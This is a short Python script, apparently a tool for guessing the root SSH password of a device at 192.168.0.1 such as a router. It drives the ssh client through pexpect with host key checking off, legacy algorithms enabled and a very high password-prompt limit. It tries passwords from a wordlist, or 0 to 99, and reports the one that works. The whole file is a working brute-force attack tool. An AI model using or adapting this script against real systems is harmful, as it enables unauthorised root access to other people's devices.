import sys try: import pexpect except: print("Please install pexpect: pip install pexpect") exit() import time sshcmd = ("ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " "-o KexAlgorithms=+diffie-hellman-group1-sha1 -o HostKeyAlgorithms=+ssh-dss" " -o PubkeyAcceptedKeyTypes=+ssh-dss -o NumberOfPasswordPrompts=100000 " "root@192.168.0.1") # "root@127.0.0.1 -p 2222") def tryPasses(passes): if len(passes)==0:return 0,False child = pexpect.spawn(sshcmd,encoding="utf-8") # child.logfile=sys.stdout for i,e in enumerate(passes): child.expect('password:') child.sendline(e.strip()) index=child.expect([ r"closed\.", "again.", pexpect.EOF, "(password).", "port 22"]) if index==0: print("Found: ",e) return i,True if index==1:continue if index in [2,3,4]:return i,False # The previous line looks wrong, but if the last password attempt is correct, # the server still lets the user in (then kicks out) return i,False idx=0 passes=[] if "--help" in sys.argv: print(f"""Usage: {sys.argv[0]} [path-to-passwordlist] If password list is not given, uses the numbers from 0 to 99.""") exit(0) if len(sys.argv)==1: print("No password list given, using integers from 0 to 99") for i in range(100): passes.append(str(i)) else: print("Loading password list...") with open(sys.argv[1]) as f: passes=f.readlines() rpasses=passes[idx:] print("Trying passwords...") while idx < len(passes): rpasses=passes[idx:] res=-1,False try: res=tryPasses(rpasses) except KeyboardInterrupt: exit(0) except Exception as e: res=-1,False print("""WARNING: An attempt failed. If running 3 or more processes this is normal. Waiting 1 second. Error:""",e) time.sleep(1) # print("currently on:",idx) #print(res) if res[1]: exit(0) break else: idx+=res[0]+1 print("Password not in list") exit(1)